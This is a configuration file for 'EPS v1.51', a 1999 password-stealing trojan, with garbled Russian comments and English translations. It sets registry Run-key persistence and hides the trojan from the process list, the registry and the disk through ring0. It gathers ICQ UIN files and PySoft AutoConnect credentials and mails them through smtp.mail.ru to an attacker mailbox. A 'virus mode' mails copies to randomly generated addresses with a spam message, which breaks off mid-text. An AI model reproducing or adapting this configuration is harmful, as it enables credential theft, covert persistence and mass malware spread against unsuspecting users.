<![CDATA[;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ THIS IS EPS ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; CTL for config.exe of EPS
;
; copr. (c) 1999 DK32
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ MESSAGE & EPS ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
; ‡ p¥§¨p¢¨p®¢ ï ¤«ï ¢ á ¢ ⥪á⥠ᮮ¡é¥¨ï áâp®ª .
; Reserved string in message body for you.
;
VERSION "eps v1.51"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ˆ¬ï ä ©« ¯®¤ ª®â®pë¬ ¡ã¤¥â ¨á⮫¨p®¢ âìáï EPS.
; Filename to install EPS.
;
INSTALLNAME "jopa2.exe"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ƒ¤¥ ¢ p¥¥áâp¥ ¤¥« âì áá뫪ã ä ©«.
; Here in registery EPS must do link.
;
INSTALLREGPATH "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
;INSTALLREGPATH "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
;INSTALLREGPATH "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
;INSTALLREGPATH "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Ž¯¨á ¨¥ ¢ p¥¥áâp¥.
; Discryption in Registery.
;
DISCRABE_FILE "151 Hide desc"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; p ¬¥âp ª®â®pë© ¡ã¤¥â ᮧ¤ ¢ âìáï, çâ®¡ë ¯®á뫪 á®®¡é¥¨© ¡ë« p § ¢ ¥¤¥«î.
; ãâì ¢ p¥¥áâp¥.
; Parameter that will set for one week send message.
; Path in the registery.
;
SLEEPREGPATH "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Multimedia"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ˆ¬ï ¯ p ¬¥âp .
; Parameter name.
; p.s. Sleep param no hide. For What ?
;
SLEEPPARAM cccc
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; STMP á¥p¢¥p ç¥p¥§ ª®â®pë© ®âáë« âì ¯¨áì¬ .
; STMP server via EPS will send messages with passwords.
;
MAILSERVER "smtp.mail.ru"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; …᫨ ¥ § ¥â¥ çâ® íâ® â ª®¥ «ãçè¥ ¥ âp®£ ©â¥.
; If you don't know - don't touch it.
;
HELO "mustdie.com"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Žâ ª ª®£® ¨¬¥¨ á« âì ¯¨á쬮. H ¯¨è¨â¥ ᢮© E-MAIL ï騪 ªã¤ «®¦¨âì ¯ p®«¨.
; Write here your E-MAIL box that will receive passwords.
;
MAILFROM "men@mail.ru"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; H ª ª®© ¤p¥á á« âì ¯¨áì¬ . H ¯¨è¨â¥ ᢮© E-MAIL ï騪 ªã¤ «®¦¨âì ¯ p®«¨.
; Write here your E-MAIL box that will receive passwords.
;
RCPT_TO "men@mail.ru"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; —â® ¯¨á âì ¢ áâp®ª¥ FROM á®®¡é¥¨ï. ‚®§¬®¦ë ¬ ªp®áë: IP, USERNAME,
; COMPUTERNAME.
; What EPS must write in FROM field in the message. Macroses: IP, USERNAME,
; COMPUTERNAME.
;
FROM USERNAME
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; —â® ¯¨á âì ¢ áâp®ª¥ TO á®®¡é¥¨ï. ‚®§¬®¦ë ¬ ªp®áë: IP, USERNAME,
; COMPUTERNAME.
; What EPS must write in TO field in the message. Macroses: IP, USERNAME,
; COMPUTERNAME.
;
TO IP
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; —â® ¯¨á âì ¢ áâp®ª¥ SUBJ á®®¡é¥¨ï. ‚®§¬®¦ë ¬ ªp®áë: IP, USERNAME,
; COMPUTERNAME.
; What EPS must write in SUBJ field in the message. Macroses: IP, USERNAME,
; COMPUTERNAME.
;
SUBJECT "UUE v3.00"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ Uninstall time ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Uninstall Trojan after some date?
;
;UNINSTTIME 30/05/2010
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ FILTER ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; IP 䨫ìâpë. ‚ᥣ® ¨å ¬®¦¥â ¡ëâì ¤¥áïâì. ”¨«ìâpë p ¡®â îâ ®âªpë⨥,
; ¥ § ªpë⨥.
; IP filters. Max number of filters = 10.
;
; p¨¬¥ç ¨¥: ‘¬®âp¨â¥ ª ª p ¡®â îâ 䨫ìâpë ¢ p¥¦¨¬¥ ®â« ¤ª¨.
; Note: See how work in debug mode.
;
IPFILTER "*.*.*.*" ; p®¯ãáâ¨âì ¢á¥ IP ¤p¥á . All IP addresses.
;IPFILTER "210.*.*.*" ; p®¯ãáâ¨âì ⮫쪮 á¥âªã 210.*.*.*. Only 210.*.*.* net.
;IPFILTER "210.34.*.*"
;IPFILTER "210.34.12.*"
;IPFILTER "210.34.12.67"
;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ATTACH FILES ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Common rules:
; If HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs|UIN Dir=D:\ICQ\UIN
; then "%REGKEY HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs|UIN Dir%"=D:\ICQ\UIN
;
; If HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs|UIN Dir=D:\ICQ\UIN\1.txt
; then "%REGCORRECT HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs|UIN Dir%"=D:\ICQ\UIN
;
; REGKEY - Simply take value. Example: D:\ICQ\UIN\1.txt=D:\ICQ\UIN\1.txt
; REGCORRECT - Take and correct value. Example: D:\ICQ\UIN\1.txt=D:\ICQ\UIN
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Š ª¨¥ ä ©«ë ¯p¨æ¥¯«ïâì ª ¯¨áì¬ã ¢ ¤¢®¨ç®¬ ¢¨¤¥.
; ”®p¬ â: APPENDFILEBINNARY or AFB <¯ãâì ¤® ä ©« >
; ˆá¯®«ì§ã©â¥ "hextobin.exe" ¤«ï ¯p¥®¡p §®¢ ¨ï ®¡p â®.
;
;AFB "%REGKEY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion|ProgramFilesDir%\taxpaymment\contribu.db"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Š ª¨¥ ä ©«ë ¯p¨æ¥¯«ïâì ª ¯¨áì¬ã ¢ ⥪á⮢®¬ ¢¨¤¥.
; ”®p¬ â: APPENDFILETEXT or AFT <¯ãâì ¤® ä ©« >
; ˆá¯®«ì§ã©â¥ "hextobin.exe" ¤«ï ¯p¥®¡p §®¢ ¨ï ®¡p â®.
;
AFT "%REGKEY HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs|UIN Dir%\*.uin"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ REGISTERY ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Š ª¨¥ ¢¥âª¨ ¢ p¥¥áâp¥ ¢ ¬ ã¦ë ¢ ¤¢®¨ç®¬ ¢¨¤¥.
; ”®p¬ â: REGTREEBINNARY or RTB <¯ãâì ¤® ¤¥p¥¢ > (¢áî ¢¥âªã)
; REGTREEBINNARYONLY or RTBO <¯ãâì ¤® ¤¥p¥¢ > (⮫쪮 íâ®â p §¤¥«)
;
;RTB "HKEY_CURRENT_USER\Software\Far\Plugins\FTP"
RTBO "HKEY_CURRENT_USER\Software\PySoft\AutoConnect"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Š ª¨¥ ¢¥âª¨ ¢ p¥¥áâp¥ ¢ ¬ ã¦ë ¢ ⥪á⮢®¬ ¢¨¤¥.
; ”®p¬ â: REGTREETEXT or RTT <¯ãâì ¤® ¤¥p¥¢ > (¢áî ¢¥âªã)
; REGTREETEXTONLY or RTTO <¯ãâì ¤® ¤¥p¥¢ > (⮫쪮 íâ®â p §¤¥«)
;
;RTT "HKEY_CURRENT_USER\Software\Far\Plugins\FTP"
;RTTO "HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners"
;RTT "HKEY_LOCAL_MACHINE\SOFTWARE\Netscape\Netscape Navigator\Users"
;RTT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
;RTT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
;RTT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ DELETEFILE ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Š ª¨¥ ä ©«ë ¤®«¦¥ 㤠«¨âì EPS ¯p¨ ¨á⮫ï樨.
; What fiels EPS must delete at install progress.
;
;
;DF "%REGKEY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion|SystemRoot%\regedit.exe"
;DF "D:\TEMP\SOUNDS\*.wav"
;
; Other need ? Simply type path.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ FLAGS ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‡ ¯ã᪠âì ¢â®pãî ª®¯¨î EPS ¢ WINDOWS\SYSTEM ¯p¨ ¨á⮫ï樨 ¨«¨ ¥â.
; Run two copy of EPS in WINDOWS\SYSTEM at first execution.
;
FIRSTEXEC No
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;“¤ «¨âì ⥫® EPS ¯®á«¥ ¨á⮫ï樨 ? ¡®â ¥â ⮫쪮 ¥á«¨ FIRSTEXEC=Yes
;Delete body of EPS after installation? Worked only if FIRSTEXEC=Yes
;
;
DELETEBODY No
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ˜¨äp®¢ âì ¬¥á £¨ ¨«¨ ¥â.
; If you set No EPS will not crypt messages.
;
CRYPTMSGS Yes
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; p®«ì è¨äp®¢ª¨ á®®¡é¥¨©.
; Password for crypted messages.
;
CRYPTPASSWORD pass
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‘ªpë¢ âì EPS ¢ ᯨ᪥ ¯p®æ¥áᮢ, ª®â®pë© ¢ë¤ ¥âáï ¯® CTRL-ALT-DEL.
; Hide EPS in process list that show at CTRL-ALT-DEL.
;
CADHIDE Yes
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; EPS can hide INSTALLNAME file from disk.
; EPS ¬®¦¥â áªpëâì ¢â®p®¥ ⥫® ¯®á«¥ ¨á⮫ï樨. ˆá¯®«ì§ã©â¥ íâ®â ä« £.
;
HIDEINSTFILE Yes
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‘ªpë¢ âì áâp®ªã § ¯ã᪠EPS ¢ p¥¥áâp¥.
; ⮠ᮢ¥p襮 ®¢ë© ¨ ¯® pãá᪨ ®åã¥ë© ¬¥â®¤ ¯p®áâ® ¥®¡å®¤¨¬, ¤«ï
; ⮣® ç⮡ë âp®ï ¥ 㤠«ï«¨ ¨§ p¥¥áâp .
; Hide trojan in registery ?
;
SUPERREGHIDELEVEL1 Yes
SUPERREGHIDELEVEL2 Yes
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‘ªpë¢ âì EPS ¤«ï äãªæ¨© Process32First() ¨ Process32Next().
; ˆá¯®«ì§ã¥âáï ¬ã«ìª á ¢ë¯®«§ ¨¥¬ ¢ RING0, ¬®¦¥â ¥ p ¡®â âì ª®p¥ªâ®
; ª®ªp¥â®© ¬ 訥.
; Hide EPS in process list that show some memory view programms -
; FAR.EXE, WINTOP.EXE and so on. This programms uses
; fuction Process32First() and Process32Next().
; EPS uses RING0 method - we not recommended use this type
; of hide in memory.
;
RING0HIDE Yes
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Attack against dial-up or private line?
; Yes - dial-up
; No - private line (24/hours day connection)
; You may set No for all dial-up and private line, but if you set
; Control panel -> InterNet -> Connection -> Connect to InterNet if need
; EPS will call dial-up connection every startup (for dial-up only).
; This method used by EPS v1.04.
;
DIALUPMETHOD Yes
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Test it by click on TESTBUG in DEBUG mode.
;
USESEH Yes
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ˆá¯®«ì§®¢ âì p¥¦¨¬ ®â« ¤ª¨. ‚ í⮬ p¥¦¨¬¥ EPS ¥ ¨á⮫¨pã¥âáï, ¢¬¥áâ®
; í⮣® ® ¯®ª §ë¢ ¥â ¤¨ «®£®¢®¥ ®ª® ¢ ª®â®p®¬ ¬®¦® ¡«î¤ âì ¯p®æ¥áá
; ¯®á뫪¨ á®®¡é¥¨ï.
; Debug mode. In this mode EPS no install it body. It show dialog box where
; you can see how EPS send the message.
;
DEBUG1 No
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‚â®p ï ç áâì ¯p®¨á⮫¨p®¢ ®£® EPS ¡ã¤¥â ¢ë¤ ¢ âì á®®¡é¥¨¥ ¯p¨ § ¯ã᪥.
; Two part of EPS will diplay message at every startup.
; Do not use it when you give EPS to you frendzz ;)
;
DEBUG2 No
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ VIRUS MODE ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; This is virus mode of EPS 8-)
;
; …᫨ ¢ª«îç¥ íâ®â p¥¦¨¬, â® ¯®á«¥ ⮣® ª ª EPS ¯®á« « ¯ p®«¨ ¢ ¢ è
; ¡®ªá ® ç¨ ¥â p ááë« âì á ¬®£® ᥡï á«ãç ©ë¬ ¯®«ì§®¢ ⥫ï¬.
; ¥p¥¬¥ ï USERS 㪠§ë¢ ¥â ᪮«ìª¨¬. ¥p¥¬¥ë¥ DOMAIN 㪠§ë¢ îâ
; ¤®¬¥ë á ª ª¨¬¨ ¤®¬¥ ¬¨ EPS ¡ã¤¥â £¥¥p¨âì E-MAIL ¤p¥á .
; MESSAGETEXT 㪠§ë¢ ¥â á ¬® ¯®áë« ¥¬®¥ á®®¡é¥¨¥.
; MESSAGETEXT <space> - ãáâ ï áâp®ª
; MESSAGETEXT <mimeeps> - Š®¤¨p®¢ ë© ¢ MIME v1.0 EPS.
;
; EPS £¥¥p¨â E-MAIL ¤p¥á ¢ ¢¨¤¥: a@DOMAIN
; aaaaa@DOMAIN, â.¥ ¤® ¯ï⨠¡ãª¢.
; H㦮 ¯®¬¨âì çâ® ¥á«¨ USERS=100 íâ® ¥®§ ç ¥â çâ® EPS ¡ã¤¥â
; á« âì 100 ª®¯¨© ¥£® á ¬®£®, ® ®â®è«¥â ¢á¥£® ®¤ã ¢á¥¬.
; „«ï ¯®á뫪¨ ¨á¯®«ì§ã¥âáï â®â¦¥ á¥p¢¥p, çâ® ¨ ¤«ï ¯®á뫪¨ ¯ p®«¥©.
;
USEVIRUSMODE Yes
;
DOMAIN hotmail.com
DOMAIN mail.ru
DOMAIN chat.ru
USERS 20
USERSLETTERS qwertyuiopasdfghjklzxcvbnm1234567890
;
MESSAGETEXT From: tcash@mail.vixxens.com
MESSAGETEXT To: trafficcash@mail.vixxens.com
MESSAGETEXT Subject: Attention CEN Webmasters
MESSAGETEXT Mime-Version: 1.0
MESSAGETEXT Content-Type: multipart/mixed; boundary="----------DB11958BB342E7"
MESSAGETEXT <space>
MESSAGETEXT ------------DB11958BB342E7
MESSAGETEXT Content-Type: text/plain
MESSAGETEXT Content-Transfer-Encoding: 7bit
MESSAGETEXT <space>
MESSAGETEXT <space>
MESSAGETEXT CEN has two{2} NEW ways to help you raise your weekly checks to a higher
MESSAGETEXT level. CEN currently has 57 webmasters making over $25,000.00 per month.
MESSAGETEXT YOU SHOULD BE ONE!
MESSAGETEXT <space>
MESSAGETEXT Try http://www.joinbucks.com
MESSAGETEXT Paying $35.00 @ SignUp Weekly
MESSAGETEXT With The Higest Conversions On The Net!
MESSAGETEXT Wait Till You See These FULL Page ADS!
MESSAGETEXT <space>
MESSAGETEXT Place-
MESSAGETEXT http://www.privateshops.com/webmasters/associates.htm
MESSAGETEXT In Your Qualified Section. Imagine Your
MESSAGETEXT Own OnLine Store Featuring Private, The
